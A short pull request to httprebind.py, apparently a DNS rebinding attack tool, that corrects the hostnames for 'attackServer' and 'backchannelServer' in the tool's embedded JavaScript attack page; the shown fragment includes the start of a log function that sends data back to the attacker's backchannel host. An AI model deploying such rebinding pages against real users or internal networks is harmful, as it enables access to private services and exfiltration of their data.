### PR TITLE
Fix server addresses in javascript

### DIFF
--- a/httprebind.py
+++ b/httprebind.py
@@ -116,8 +116,8 @@ log.setLevel(logging.ERROR)
 boilerplate = '''
 <img src="loaded">
 <script>
-var backchannelServer = 'bc.ex.$BASE$';
-var attackServer = 'ex.$BASE$';
+var backchannelServer = 'bc.$BASE$';
+var attackServer = '$BASE$';
 
 function log(data) {
     var sreq = new XMLHttpRequest();


### PR DESCRIPTION
`$BASE$` is `D.ex` i.e. `ex.yourdomain.tld`. The previous code would double up the `ex.` part.